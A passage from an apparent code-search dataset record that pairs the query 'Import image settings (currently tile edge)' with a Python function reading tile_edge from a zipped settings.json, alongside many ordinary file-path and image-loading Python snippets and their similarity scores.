in self._paths]\n if self._base_commit is not None:\n paths = [\n a\n for a in (self._status.added + self._status.modified)\n # diff_path is a subpath of some element of input_paths\n if any((a == path or path in a.parents) for path in paths)\n ]\n changed_count = len(paths)\n click.echo(f\"| looking at {unit_len(paths, 'changed path')}\", err=True)\n paths = [\n path\n for path in paths\n if all(\n submodule_path not in path.parents\n for submodule_path in submodule_paths\n )\n ]\n if len(paths) != changed_count:\n click.echo(\n f\"| skipping files in {unit_len(submodule_paths, 'submodule')}: \"\n + \", \".join(str(path) for path in submodule_paths),\n err=True,\n )\n\n # Filter out ignore rules, expand directories\n self._ignore_rules_file.seek(0)\n patterns = Parser(self._base_path).parse(self._ignore_rules_file)\n\n file_ignore = FileIgnore(\n base_path=self._base_path, patterns=patterns, target_paths=paths\n )\n\n walked_entries = list(file_ignore.entries())\n click.echo(\n f\"| found {unit_len(walked_entries, 'file')} in the paths to be scanned\",\n err=True,\n )\n filtered: List[Path] = []\n for elem in walked_entries:\n if elem.survives:\n filtered.append(elem.path)\n\n skipped_count = len(walked_entries) - len(filtered)\n if skipped_count:\n click.echo(\n f\"| skipping {unit_len(range(skipped_count), 'file')} based on path ignore rules\",\n err=True,\n )\n\n relative_paths = [path.relative_to(self._base_path) for path in filtered]\n\n return relative_paths", "def prep_files(app):\n smali_paths = []\n start = time.time()\n \n for root, dirs, files in os.walk(app, topdown=False):\n for name in files:\n if name[-6:] == \".smali\":\n smali_paths.append(str(os.path.join(root, name)))\n \n return smali_paths", "def get_files():\n\n img_dir = '../ADE20K_2016_07_26/full_data/images/validation/'\n sem_dir = '../ADE20K_2016_07_26/full_data/annotations/validation/'\n ins_dir = '../ADE20K_2016_07_26/full_data/annotations_instance/validation/'\n\n img_files = os.listdir(img_dir)\n sem_files = os.listdir(sem_dir)\n ins_files = os.listdir(ins_dir)\n \n img_files = [ os.path.join(img_dir,item) for item in img_files ]\n sem_files = [ os.path.join(sem_dir,item) for item in sem_files ]\n ins_files = [ os.path.join(ins_dir,item) for item in ins_files ]\n \n img_files.sort()\n sem_files.sort()\n ins_files.sort()\n \n return img_files, sem_files, ins_files", "def get_fastq_files(self) -> List[Path]:\n return list(self.sequence_data_paths.fastq_path.glob(\"*.fastq.gz\")) # type: ignore", "def get_testcases(input, output):\n input_files = set(os.listdir(input))\n output_files = set(os.listdir(output))\n common_files = sorted(\n list(input_files & output_files), key=lambda x: os.path.basename(x)\n )\n return common_files", "def args_to_input_file_list(arg):\n # Check if the input file is a directory.\n if os.path.isdir(arg[0]):\n print \"Provided directory.\"\n file_list = [arg[0] + \"/\" + \n f for f in os.listdir(arg[0])]\n else:\n file_list = arg\n return file_list", "def files(self):\n self._printer('\\tFiles Walk')\n for directory in self.directory:\n for path in os.listdir(directory):\n full_path = os.path.join(directory, path)\n if os.path.isfile(full_path):\n if not path.startswith('.'):\n self.filepaths.append(full_path)\n return self._get_filepaths()", "def expandFilenames(filenames):\n \n abs_filenames = []\n for f in filenames:\n abs_filenames.append(os.path.abspath(f))\n \n return abs_filenames", "def storer_paths():\n return [dir_unchecked(), dir_checked(),\n dir_backup(), dir_tests()]", "def __get_absolute_cert_files(self):\n\n abs_path = None\n if self.__mqtt_cert_file:\n root = pathlib.Path(__file__).parent.absolute()\n abs_path = (os.path.join(root, 'cert', self.__mqtt_cert_file + '.pem'),\n os.path.join(root, 'cert', self.__mqtt_cert_file + '.pkey'))\n return abs_path", "def get_files(self):\n # TODO checking extensions here should be moved to parsers, and it should\n # probably use 'magic' rather than extensions. See Python magic library\n\n self.files = []\n if Path(self.args.path).is_dir():\n for root, dirnames, filenames in os.walk(self.args.path):\n for extension in ['pcap', 'dump', 'cap']:\n for filename in fnmatch.filter(filenames, '*.' + extension):\n self.files.append(os.path.join(root, filename))\n elif Path(self.args.path).is_file() and \\\n os.path.split(str(self.args.path))[-1].split('.')[-1] in {'pcap', 'dump', 'cap'}:\n self.files.append(str(self.args.path))\n else:\n self.logger.error(\n 'Input \\'%s\\' was neither a file nor a directory.', str(self.args.path))\n\n if not self.files:\n self.logger.error(\n 'Did not find file(s) from \\'%s\\'.', str(self.args.path))\n return", "def get_valid_files(paths: List[str]) -> List[str]:\n all_paths = []\n\n for path in paths:\n if path.endswith('.txt'):\n all_paths.append(path)\n elif path.endswith('.zip'):\n # this is only a placeholder for adding mer files\n all_paths.extend(get_txt_files_from_zip(path))\n elif path.endswith('.mer'):\n all_paths.append(path)\n else:\n raise TypeError('Can only import .txt, .zip & .mer. Invalid file: ' + path)\n return all_paths", "def xml_filepaths(cls):\n # pylint: disable=no-self-argument,not-an-iterable\n filepaths = []\n\n for filename in cls.xml_filenames:\n filepath = os.path.join(\n cls._OUTPUT_SUBFOLDER,\n '{}_{}.save'.format(cls._PREFIX, cls._CP_WRITE_UNIT_NUMBER),\n filename,\n )\n filepaths.append(filepath)\n\n return filepaths", "def _findFiles(self, inputfolder):\n protofile, caffemodel = None, None\n files = os.listdir(inputfolder)\n for f in files:\n name, ext = splitext(f)\n if ext == '.caffemodel':\n caffemodel = join(inputfolder, f)\n elif f == 'deploy.prototxt':\n protofile = join(inputfolder, f)\n return protofile, caffemodel", "def sources_relative_to_buildroot(self):\r\n for src in self.sources:\r\n yield os.path.join(self.target_base, src)", "def find_all_files(self):\n look4files = [ f for f in listdir(self.file_location) if isfile(join(self.file_location,f)) ]\n return look4files", "def get_all_files(cwd):\n return os.listdir(cwd)", "def incoming_paths(root_dir, parent_dir):\n return {\n 'F1' : os.path.join(root_dir, \"F1\"),\n 'F' : os.path.join(parent_dir, \"F\"),\n 'F2' : os.path.join(parent_dir, \"F2-in\"),\n 'D1' : os.path.join(root_dir, \"D1\"),\n 'D' : os.path.join(parent_dir, \"D\"),\n 'D2' : os.path.join(parent_dir, \"D2-in\"),\n }", "def get_filepaths(self):\n image_filepaths = set()\n for one_dir in self.dirs:\n for root, dirnames, filenames in os.walk(one_dir):\n for filename in filenames:\n if re.search(r\"\\.(jpg|jpeg|png|bmp|tiff)$\", filename):\n image_filepaths.add(os.path.join(root, filename))\n image_filepaths = sorted(list(image_filepaths))\n return image_filepaths", "def _get_files(self, paths: List[str]) -> List[Tuple[str, bytes]]:\n pool = multiprocessing.dummy.Pool(self._processes)\n return pool.map(self._get_file, paths) # type: ignore", "def get_file_list(input_list):\n if not isinstance(input_list, Iterable) or isinstance(input_list, str):\n raise ArgumentTypeError('input_list must be iterable (and not string)')\n file_list = []\n for item in input_list:\n if os.path.isfile(item):\n file_list.append(os.path.abspath(item))\n elif os.path.isdir(item):\n for fname in os.listdir(item):\n path = os.path.join(item, fname)\n if os.path.isfile(path):\n file_list.append(path)\n else:\n raise OpenL3Error('Could not find {}'.format(item))\n\n return file_list", "def locations(self):\n return [part.file for part in self.iterParts() if part]", "def locations(self):\n return [part.file for part in self.iterParts() if part]", "def locations(self):\n return [part.file for part in self.iterParts() if part]", "def _path_files_format(self):\n\n correct_files = []\n\n for file in self.files:\n if not file.startswith(self.path):\n correct_files.append(os.path.join(self.path, file))\n else:\n correct_files.append(file)\n\n self.files = correct_files", "def get_all_test_files(*args, **kwargs):\n return atable.get_all_input_files(*args, **kwargs)", "def get_all_image_paths(self):\n image_paths, image_labels = [], []\n for directory_name, subdirectory_list, file_list in os.walk(self.root_directory):\n for file_name in file_list:\n if file_name.endswith(('.jpg',)):\n image_paths.append(os.path.join(directory_name, file_name))\n # Translates labels to 0-26 as recommended in the exercise description\n image_labels.append(ord(directory_name[-1]) - 97)\n return image_paths, image_labels", "def getpaths_fromdir(input_prefix_, directory_):\n path = os.path.join(input_prefix_, \"%s*\" % directory_, \"*\")\n return [tuple([directory_, path])]", "def _get_files(self):\n # pylint: disable=unused-variable\n for dirpath, __, filenames in os.walk(self.start_location):\n for file_ in filenames:\n if file_.endswith('.py'):\n yield \"{0}{1}\".format(dirpath, file_)", "def find_reference_files():\n for root, _, files in os.walk(\"./tests/references/\"):\n for basename in fnmatch.filter(files, \"*.tex\"):\n yield os.path.join(root, basename)", "def file_path(self) -> Path:\n return self._input_file", "def get_paths(pattern):\n if not in_source_tree:\n pattern = '../' + pattern\n\n files = glob.glob(os.path.normpath(os.path.join(top_dir, pattern)))\n return files", "def get_train_files(self):\n train_dir = os.path.join(self.data_dir, \"train_{}\".format(self.patient_no))\n filenames = os.listdir(train_dir)\n interm = ((os.path.splitext(f)[0].split(\"_\"), os.path.join(train_dir, f)) for f in filenames)\n return [(int(p[0][0]), int(p[0][1]), int(p[0][2]), p[1]) for p in interm]", "def GetInputFilename(fname):\n if not indir or fname[:1] == '/':\n return fname\n for dirname in indir:\n pathname = os.path.join(dirname, fname)\n if os.path.exists(pathname):\n return pathname\n\n raise ValueError(\"Filename '%s' not found in input path (%s) (cwd='%s')\" %\n (fname, ','.join(indir), os.getcwd()))", "def paths(self, toNative=True):\n if self.__mode == E5PathPickerModes.OpenFilesMode:\n return self.path(toNative=toNative).split(\";\")\n else:\n return [self.path(toNative=toNative)]", "def get_string_of_files_paths(self):\n to_return = \"\"\n for paths in self.__files_paths:\n if len(paths) != 0:\n to_return += paths + \" \"\n return to_return", "def orig_filepath_list(filename_list, src_path):\n orig_filepaths = list([])\n i = 0\n for filename in filename_list:\n orig_filepaths.append(src_path + filename_list[i])\n i += 1\n return orig_filepaths", "def get_filepaths(subject_name):\n file_paths = [] # List which will store all of the full filepaths.\n\n directory = \"../mathgenerator/funcs/\" + subject_name\n # Walk the tree.\n for root, directories, files in os.walk(directory):\n for filename in files:\n # Join the two strings in order to form the full filepath.\n filepath = os.path.join(root, filename)\n\n front_len = 24+len(subject_name)\n filename = filepath[front_len:-3]\n file_paths.append(filename) # Add it to the list.\n\n return file_paths", "def list_output_files(self):\r\n fname = self.__get_output_filename()\r\n return [fname] if fname else []", "def files(self):\r\n files = []\r\n for path in self.paths:\r\n if os.path.isdir(path):\r\n files.extend(glob.glob(os.path.join(path, f'*{self.ext}')))\r\n else:\r\n files.extend(glob.glob(path))\r\n return list(set(self.get_pattern(fname) for fname in files))", "def filepaths(self) -> Dict[str, 'BinPackageFile']:\n return self._get_package_files()" ]
[ "0.6970691", "0.6879517", "0.6868738", "0.6868052", "0.67055565", "0.6700424", "0.65872943", "0.657331", "0.6540866", "0.651123", "0.65038157", "0.65028954", "0.6485323", "0.6448438", "0.63885504", "0.6380545", "0.63705975", "0.63195634", "0.6316908", "0.63139904", "0.62974036", "0.6260034", "0.62238383", "0.6191406", "0.61830497", "0.617022", "0.6137567", "0.6127645", "0.6106573", "0.6082255", "0.60791814", "0.6072339", "0.6062113", "0.60572106", "0.6056539", "0.60417205", "0.60205656", "0.60100853", "0.5989413", "0.597538", "0.5973043", "0.5959975", "0.5951728", "0.59406066", "0.59112805", "0.5910649", "0.5899212", "0.5898601", "0.58910054", "0.58825684", "0.58637685", "0.58625793", "0.58552104", "0.5845008", "0.5837567", "0.5829635", "0.5826675", "0.5823743", "0.58236116", "0.58213264", "0.581845", "0.5817133", "0.58146304", "0.5797441", "0.57936513", "0.5786646", "0.57858926", "0.5780082", "0.5776415", "0.57761306", "0.5756162", "0.5751605", "0.5749819", "0.57495403", "0.57447475", "0.5739376", "0.5728577", "0.572449", "0.571961", "0.5718476", "0.5718468", "0.5718468", "0.5718468", "0.57139623", "0.5709991", "0.5709981", "0.5709464", "0.5701536", "0.57008594", "0.5693349", "0.5691373", "0.5691292", "0.5685575", "0.5682495", "0.5680487", "0.567487", "0.56733334", "0.5672085", "0.5668918", "0.5668874" ]
0.71486807
0
Import image settings (currently tile edge).
def update_tile_edge(path): zfile = os.path.splitext(path)[0] + '.zip' if zf.is_zipfile(zfile): with zf.ZipFile(zfile) as z: if 'settings.json' in z.namelist(): x = z.read('settings.json').decode('utf-8') x = yaml.safe_load(x) set('tile_edge', x['tile_edge']) return get('tile_edge')
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def import_image(self, file: str) -> Any:\n pass", "def importImg(self):\n logger.info(\"import image \"+ str(self))\n file,types = QtWidgets.QFileDialog.getOpenFileName(self, 'Choose Image',\n BASE_DIR,\"Image files (*.jpg *.gif *.png)\")\n logger.debug(file)\n self.imageFile = file\n self.image.setPixmap(QtGui.QPixmap(file))\n self.image.adjustSize()", "def import_image(self, imfile):\n img = self._load_image(imfile)\n img = self._trim_margins(img)\n self._check_size(img)\n return img", "def load_image(self, **kwargs):\n ...", "def __init__(self, img, settings):\r\n self.img_orig = img\r\n self.settings = settings", "def get_settings(dataset: DS):\n if dataset == DS.ARTIFICIAL_BBOX:\n project_path = Path('data/artificial/')\n project_file = project_path / 'annotations.json'\n image_dir = 'images'\n _, annotations = create_color_classification(path=project_path, n_samples=50,\n size=(500, 500))\n\n anno = {str(project_path / image_dir / k): [f'{v}.jpg'] for k, v in annotations.items()}\n\n with open(project_file, 'w') as f:\n json.dump(anno, f)\n\n return Settings(project_path=project_path,\n project_file=project_file,\n image_dir=image_dir,\n label_dir='class_images',\n # used on create step - should be empty!\n result_dir='create_results',\n im_width=50, im_height=50,\n label_width=30, label_height=30,\n n_cols=3)\n elif dataset == DS.ARTIFICIAL_VIDEO:\n project_path = Path('data/artificial/')\n project_file = project_path / 'annotations.json'\n image_dir = 'images'\n create_mot_ds(project_path, image_dir, 20, True)\n return Settings(\n project_path=project_path,\n project_file=project_file,\n image_dir=image_dir,\n im_width=200,\n im_height=200,\n result_dir='create_results',\n )\n elif dataset == DS.CIFAR10:\n cifar_train_p, cifar_test_p = get_cifar10(Path('data'))\n\n return Settings(project_path=Path('data/cifar10/'),\n project_file=cifar_test_p,\n image_dir='test',\n label_dir=None,\n # used on create step - should be empty!\n result_dir='create_results',\n im_width=50, im_height=50,\n label_width=140, label_height=30,\n n_cols=2)\n\n elif dataset == DS.OXFORD102:\n flowers102_train_p, flowers102_test_p = get_oxford_102_flowers(Path('data'))\n\n return Settings(project_path=Path('data/oxford-102-flowers'),\n project_file=flowers102_test_p,\n image_dir='jpg',\n label_dir=None,\n # used on create step - should be empty!\n result_dir='create_results',\n im_width=50, im_height=50,\n label_width=40, label_height=30,\n n_cols=7)\n\n elif dataset == DS.CUB200:\n cub200_train_p, cub200_test_p = get_cub_200_2011(Path('data'))\n\n return Settings(project_path=Path('data/CUB_200_2011'),\n project_file=cub200_test_p,\n image_dir='images',\n label_dir=None,\n # used on create step - should be empty!\n result_dir='create_results',\n im_width=50, im_height=50,\n label_width=50, label_height=50,\n n_cols=7)\n else:\n raise UserWarning(f\"Dataset {dataset} is not supported!\")", "def list_image_import_opts():\n\n opts = copy.deepcopy(_image_import_opts)\n opts.extend(plugin_opts.get_plugin_opts())\n return [(g, copy.deepcopy(o)) for g, o in opts]", "def importAll(self, imdata = True, imlights = True, imaovs = True, imshaders = True, immaster = True, asset = '', searchAndReplace = ['',''] ):\n\t\tif immaster:\n\t\t\tself.importMasterSettings()\n\t\tif imlights and self.lightPath.exists:\n\t\t\tself.importLights( asset, searchAndReplace )\n\t\tif imaovs and self.aovsPath.exists:\n\t\t\tself.importAovs()\n\t\tif imshaders and self.shaderPath.exists:\n\t\t\tself.importShaders()\n\t\tif imdata and self.dataPath.exists:\n\t\t\tself.importData( asset, searchAndReplace )", "def importMasterSettings(self):\n\t\tpickleData = pickle.load( open( self.masterPath.path, \"rb\" ) )\n\t\tmaster = rlayer.RenderLayer( 'defaultRenderLayer' )\n\t\tmaster.makeCurrent()\n\t\tfor a in pickleData.keys():\n\t\t\ttry:\n\t\t\t\ta.v = pickleData[a]\n\t\t\texcept:\n\t\t\t\tcontinue", "def configure(self):\n self.data_batch_file = self.get_value_from_config('data_batch_file')\n self.batch_meta_file = self.get_value_from_config('batch_meta_file')\n self.has_background = self.get_value_from_config('has_background')\n self.num_classes = self.get_value_from_config('num_classes')\n self.converted_images_dir = self.get_value_from_config('converted_images_dir')\n if not self.converted_images_dir:\n self.converted_images_dir = self.data_batch_file.parent / 'converted_images'\n self.convert_images = self.get_value_from_config('convert_images')\n # create directory for storing images if it is necessary\n if self.convert_images and not self.converted_images_dir.exists():\n self.converted_images_dir.mkdir(parents=True)\n self.dataset_meta = self.get_value_from_config('dataset_meta_file')", "def load_image_custom(self, image_id):\n \n info = self.image_info[image_id]\n filePath = info[\"path\"]\n \n filename = os.path.basename(filePath)\n filePath = os.path.dirname(os.path.dirname(filePath))\n \n image = []\n image.append(self.read_image(filePath + \"/artery/\" + filename)[:,:,0]) # artery phase\n image.append(self.read_image(filePath + \"/portal/\" + filename)[:,:,0]) # portal-venous phase\n image.append(self.read_image(filePath + \"/delay/\" + filename)[:,:,0]) # delay phase\n image = np.transpose(image,(1,2,0))\n \n return image, filename", "def load_image_parts(self, filename, margin, spacing, tile_width, tile_height, colorkey=None): #-> [images]\n raise NotImplementedError(u'This should be implemented in a inherited class')", "def load_image_parts(self, filename, margin, spacing, tile_width, tile_height, colorkey=None): #-> [images]\n raise NotImplementedError(u'This should be implemented in a inherited class')", "def _create_default_setting(path):\n try:\n from configparser import ConfigParser\n except ImportError:\n from ConfigParser import ConfigParser # ver. < 3.0\n\n # instantiate\n config = ConfigParser()\n\n # update existing value\n config['Assets Paths'] = {\n 'background': 'assets\\\\images\\\\background.png',\n 'bullet': 'assets\\\\images\\\\bullet.png',\n 'bullet_red': 'assets\\\\images\\\\bullet_red.png',\n 'icon' : 'assets\\\\images\\\\RedInvader.png',\n\n 'ship': 'assets\\\\images\\\\Ship.png',\n 'ship_cr': 'assets\\\\images\\\\ShipCrushedRight.png',\n 'ship_cl': 'assets\\\\images\\\\ShipCrushedLeft.png',\n 'ship_cc': 'assets\\\\images\\\\ShipWhite.png',\n\n 'invadera1': 'assets\\\\images\\\\InvaderA1.png',\n 'invadera2': 'assets\\\\images\\\\InvaderA2.png',\n 'invaderb1': 'assets\\\\images\\\\InvaderB1.png',\n 'invaderb2': 'assets\\\\images\\\\InvaderB2.png',\n 'invaderc1': 'assets\\\\images\\\\InvaderC1.png',\n 'invaderc2': 'assets\\\\images\\\\InvaderC2.png',\n\n }\n config['castle'] = {\n 'castle_location': [\n [1, 1, 1, 1, 1],\n [1, 1, 1, 1, 1],\n [1, 1, 0, 1, 1],\n [1, 1, 0, 1, 1],\n [1, 0, 0, 0, 1],\n ],\n 'start_x': 50,\n 'start_y': 500,\n 'column': 5,\n 'row': 5,\n 'block_l3': (9, 255, 14),\n 'block_l2': (27, 255, 30),\n 'block_l1': (114, 255, 133),\n }\n config['alien'] = {\n 'margin_width': 200,\n 'margin_height': 20,\n 'column': 'd',\n 'Row': 5,\n 'width_x': 10,\n 'width_y': 10,\n 'movement': 10,\n 'alien_column_config': r'{\"0\":{\"path1\":\"InvaderA1\",\"path2\":\"InvaderA2\"},\"1\":{\"path1\":\"InvaderB1\",\"path2\":\"InvaderB2\"},\"2\":{\"path1\":\"InvaderB1\",\"path2\":\"InvaderB2\"},\"3\":{\"path1\":\"InvaderC1\",\"path2\":\"InvaderC2\"},\"4\":{\"path1\":\"InvaderC1\",\"path2\":\"InvaderC2\"}}'\n }\n config['player 1'] = {\n 'margin': 20,\n 'speed': 3\n }\n\n with open(path, 'w') as configfile:\n config.write(configfile)", "def load_image(self, image_index):\n\t\t\timage_info = self.coco.loadImgs(self.image_ids[image_index])[0]\n\t\t\tpath = os.path.join(self.data_dir, 'images', self.set_name, image_info['file_name'])\n\t\t\treturn read_image_bgr(path)", "def initImages(self):\n pass", "def initImages(self):\n pass", "def initImages(self):\n pass", "def test_image_import(self):\r\n module_store = modulestore('direct')\r\n\r\n content_store = contentstore()\r\n\r\n # Use conditional_and_poll, as it's got an image already\r\n import_from_xml(\r\n module_store,\r\n 'common/test/data/',\r\n ['conditional_and_poll'],\r\n static_content_store=content_store\r\n )\r\n\r\n course = module_store.get_courses()[0]\r\n\r\n # Make sure the course image is set to the right place\r\n self.assertEqual(course.course_image, 'images_course_image.jpg')\r\n\r\n # Ensure that the imported course image is present -- this shouldn't raise an exception\r\n asset_key = course.id.make_asset_key('asset', course.course_image)\r\n content_store.find(asset_key)", "def __loadImage(self, parameters):\n # self.localConfigured = Settings.instance().readValue( key = 'Common/local-repo' )\n for pr in parameters:\n if pr['type'] == 'image':\n if pr['value'].startswith('undefined:/'):\n fileName = pr['value'].split('undefined:/')[1]\n if not os.path.exists( fileName ):\n raise Exception(\"the following image file is missing: %s \" % fileName)\n\n file = QFile(fileName)\n if not file.open(QIODevice.ReadOnly):\n raise Exception(\"error opening image file %s\" % fileName )\n else:\n imageData= file.readAll()\n pr['value'] = \"undefined:/%s\" % base64.b64encode(imageData)\n elif pr['value'].startswith('local-tests:/'):\n fileName = pr['value'].split('local-tests:/')[1]\n\n if not os.path.exists( fileName ):\n raise Exception(\"the following image file is missing: %s \" % fileName)\n \n file = QFile(fileName)\n if not file.open(QIODevice.ReadOnly):\n raise Exception(\"error opening image file %s\" % fileName )\n else:\n imageData= file.readAll()\n pr['value'] = \"local-tests:/%s\" % base64.b64encode(imageData)\n else:\n pass", "def import_data(self, img_size):\n path = self._path\n images = []\n labels = []\n\n categs_name = [filename for filename in os.listdir(path)]\n for categ in categs_name:\n if isdir(join(path, categ)):\n\n for img_name in os.listdir(join(path, categ)):\n\n if \".jpg\" in img_name:\n\n img_name = self.correct_filename(img_name, categ)\n img_path = join(path, categ, img_name)\n img = cv2.imread(img_path)\n\n if img_size:\n dim = (img_size, img_size)\n try:\n img = cv2.resize(img, dim)\n except:\n print(img_name, \"has not been loaded.\")\n continue\n\n images.append(img)\n labels.append(categ)\n\n X = np.array(images)\n y = self.transform_labels(labels)\n\n return X, y", "def load_image(self, filename, colorkey=None): # -> image\n raise NotImplementedError(u'This should be implemented in a inherited class')", "def load_image(self, filename, colorkey=None): # -> image\n raise NotImplementedError(u'This should be implemented in a inherited class')", "def _load(f, as_gray=False):\n # importing io is quite slow since it scans all the backends\n # we lazy import it here\n from skimage.io import imread\n return imread(os.path.join(data_dir, f), plugin='pil', as_gray=as_gray)", "def load(self):\n # copy defaults\n self.config = dict(**self.DEFAULTS)\n # read configuration\n savedconfig = Blender.Registry.GetKey(self.CONFIG_NAME, True)\n # port config keys from old versions to current version\n try:\n self.config[\"IMPORT_TEXTURE_PATH\"] = savedconfig[\"TEXTURE_SEARCH_PATH\"]\n except:\n pass\n try:\n self.config[\"IMPORT_FILE\"] = Blender.sys.join(\n savedconfig[\"NIF_IMPORT_PATH\"], savedconfig[\"NIF_IMPORT_FILE\"])\n except:\n pass\n try:\n self.config[\"EXPORT_FILE\"] = savedconfig[\"NIF_EXPORT_FILE\"]\n except:\n pass\n try:\n self.config[\"IMPORT_REALIGN_BONES\"] = savedconfig[\"REALIGN_BONES\"]\n except:\n pass\n try:\n if self.config[\"IMPORT_REALIGN_BONES\"] == True:\n self.config[\"IMPORT_REALIGN_BONES\"] = 1\n elif self.config[\"IMPORT_REALIGN_BONES\"] == False:\n self.config[\"IMPORT_REALIGN_BONES\"] = 0\n except:\n pass\n try:\n if savedconfig[\"IMPORT_SKELETON\"] == True:\n self.config[\"IMPORT_SKELETON\"] = 1\n elif savedconfig[\"IMPORT_SKELETON\"] == False:\n self.config[\"IMPORT_SKELETON\"] = 0\n except:\n pass\n # merge configuration with defaults\n if savedconfig:\n for key, val in self.DEFAULTS.iteritems():\n try:\n savedval = savedconfig[key]\n except KeyError:\n pass\n else:\n if isinstance(savedval, val.__class__):\n self.config[key] = savedval\n # store configuration\n Blender.Registry.SetKey(self.CONFIG_NAME, self.config, True)\n # special case: set log level here\n self.update_log_level(\"LOG_LEVEL\", self.config[\"LOG_LEVEL\"])", "def load_image():\n # pylint: disable=global-statement\n global current_frame, current_loop, frame_count, frame_duration, bitmap\n while sprite_group:\n sprite_group.pop()\n\n filename = SPRITESHEET_FOLDER + \"/\" + file_list[current_image]\n\n bitmap = displayio.OnDiskBitmap(filename)\n ### Change the palette value proportional to BRIGHTNESS\n bitmap.pixel_shader[1] = image_brightness(brightness)\n sprite = displayio.TileGrid(\n bitmap,\n pixel_shader=bitmap.pixel_shader,\n tile_width=bitmap.width,\n tile_height=matrix.display.height,\n )\n\n sprite_group.append(sprite)\n\n current_frame = 0\n current_loop = 0\n frame_count = int(bitmap.height / matrix.display.height)\n frame_duration = DEFAULT_FRAME_DURATION", "def import_image():\n img = cv2.imread(\"resources/lena.png\")\n\n cv2.imshow(\"Output\", img)\n cv2.waitKey(0)", "def load_image(self, image_id):\n \n # load image infos\n \n info = self.image_info[image_id]\n patch_path = info['path']\n width = info['width']\n height = info['height']\n impath = os.path.join(patch_path,\"images\")\n file_list = os.listdir(impath) \n channels = info['channels']\n \n image = []\n \n # stack channels to be loaded.\n \n for channel in channels:\n \n if channel == \"none\":\n channel_image = skimage.img_as_ubyte(np.zeros( (height,width) ) )\n \n else:\n channel_image_name = [x for x in file_list if channel in x][0] \n channel_image_path = os.path.join(impath, channel_image_name)\n channel_image = skimage.io.imread(channel_image_path)\n channel_image = skimage.img_as_ubyte(channel_image)\n image.append(channel_image)\n \n image = np.stack(image, axis=2)\n \n return image", "def setImage(*args):", "def load_minimap(self):\n minimap_types = ['cover', 'fog']\n self.game_data[\"minimap\"] = {\"fog\": None, \"cover\": None}\n file_name = self.game_data[\"file_name\"].split(\".json\")[0]\n for minimap_type in minimap_types:\n file_name = f\"{file_name}-{minimap_type}.png\"\n self.game_data[\"minimap\"][minimap_type] = pg.image.load(\n path.join(self.saved_minimap, file_name)).convert_alpha()\n logger.info(\"Load the minimap %s\", file_name)", "def change_img_pixel_format():\n\tbackground_module.bg = background_module.bg.convert()\n\tbackground_module.snow = background_module.snow.convert_alpha()\n\n\tforeground_module.ground = foreground_module.ground.convert_alpha()\n\t\n\tplayer_module.Player.imgs = [img.convert_alpha() for img in player_module.player.imgs]\n\tplayer_module.Propeller.propeller_imgs = [img.convert_alpha() for img in player_module.Propeller.propeller_imgs]\n\n\tcoins_module.Coin.resized_imgs = [img.convert_alpha() for img in coins_module.Coin.resized_imgs]\n\tcoins_module.coin_board = coins_module.coin_board.convert_alpha()\n\n\tobstacles_module.Tree.resized_imgs = [img.convert_alpha() for img in obstacles_module.Tree.imgs]\n\tobstacles_module.Rock_n_Bush.imgs = [img.convert_alpha() for img in obstacles_module.Rock_n_Bush.imgs]\t\n\n\teffects_module.Coin_spark_effects.imgs = [img.convert_alpha() for img in effects_module.Coin_spark_effects.imgs]\n\teffects_module.Hit_effects.imgs = [img.convert_alpha() for img in effects_module.Hit_effects.imgs]\n\n\tdisplay_module.heart = display_module.heart.convert_alpha()\n\tdisplay_module.line = display_module.line.convert_alpha()\n\tdisplay_module.start = display_module.start.convert_alpha()\n\tdisplay_module.finish = display_module.finish.convert_alpha()\n\tdisplay_module.fuel_bar.img_icon = display_module.fuel_bar.img_icon.convert_alpha()\n\n\tfor fuel in display_module.Fuel.fuel_list:\n\t\tfuel.img = fuel.img.convert_alpha()\n\tfor extra_life in display_module.Extra_life.extra_lives_list:\n\t\textra_life.img = extra_life.img.convert_alpha()\n\t\n\tdynamic_obstacle_giftbox.Gift.imgs_list = [img.convert_alpha() for img in dynamic_obstacle_giftbox.Gift.imgs_list]\n\tdynamic_obstacle_santa.Santa.imgs_list = [img.convert_alpha() for img in dynamic_obstacle_santa.Santa.imgs_list]\n\tdynamic_obstacle_olaf.Olaf.imgs_list = [img.convert_alpha() for img in dynamic_obstacle_olaf.Olaf.imgs_list]\n\tbird_module.Bird.list_of_lists = [[img.convert_alpha() for img in lst] for lst in bird_module.Bird.list_of_lists]", "def load(self, dirname):\n loaded_filenames = set()\n ini_filename = os.path.join(dirname, \"xpresser.ini\")\n if os.path.exists(ini_filename):\n config = ConfigParser.ConfigParser()\n config.read(ini_filename)\n for section_name in config.sections():\n if section_name.startswith(\"image \"):\n image_name = section_name.split(None, 1)[1]\n try:\n image_filename = config.get(section_name, \"filename\")\n except ConfigParser.NoOptionError:\n raise ImageDirError(\"Image %s missing filename option\"\n % image_name)\n image_filename = os.path.join(dirname, image_filename)\n if not os.path.exists(image_filename):\n raise ImageDirError(\"Image %s file not found: %s\" %\n (image_name, image_filename))\n try:\n image_similarity = config.getfloat(section_name,\n \"similarity\")\n except ConfigParser.NoOptionError:\n image_similarity = None\n except ValueError:\n value = config.get(section_name, \"similarity\")\n raise ImageDirError(\"Image %s has bad similarity: %s\"\n % (image_name, value))\n \n try:\n value = config.get(section_name, \"focus_delta\")\n match = CLICK_POSITION_RE.match(value)\n if not match:\n raise ImageDirError(\"Image %s has invalid click \"\n \"position: %s\" %\n (image_name, value))\n image_focus_delta = (int(match.group(\"x\")),\n int(match.group(\"y\")))\n except ConfigParser.NoOptionError:\n image_focus_delta = None\n image = Image(name=image_name,\n filename=image_filename,\n similarity=image_similarity,\n focus_delta=image_focus_delta)\n self._images[image_name] = image\n loaded_filenames.add(image_filename)\n\n # Load any other images implicitly with the default arguments.\n for basename in os.listdir(dirname):\n filename = os.path.join(dirname, basename)\n if filename not in loaded_filenames:\n ftype, fencoding = mimetypes.guess_type(filename)\n if ftype and ftype.startswith(\"image/\"):\n image_name = os.path.splitext(basename)[0]\n self._images[image_name] = Image(name=image_name,\n filename=filename)", "def load_image_i(self, img_tk):\n\n self.p2_label_img.configure(image=img_tk)\n self.p2_label_img.image = img_tk", "def load_image(self, index):\n image_path = os.path.join(self.folder_path, self.image_ids[index] + '.jpg')\n img = Image.open(image_path).convert('RGB')\n if debug:\n print(\"Loaded image: \", image_path)\n return img", "def load_images():\n print(\"[+] UPDATE - Begin loading images\")\n\n colors = [\"w\", \"b\"]\n piece_types = [\"p\", \"R\", \"N\", \"B\", \"K\", \"Q\"]\n for color in colors:\n for type in piece_types:\n piece = color + type\n IMAGES[piece] = p.transform.scale(p.image.load(\"images/\" + piece + \".png\"), (SQ_SIZE, SQ_SIZE))\n\n 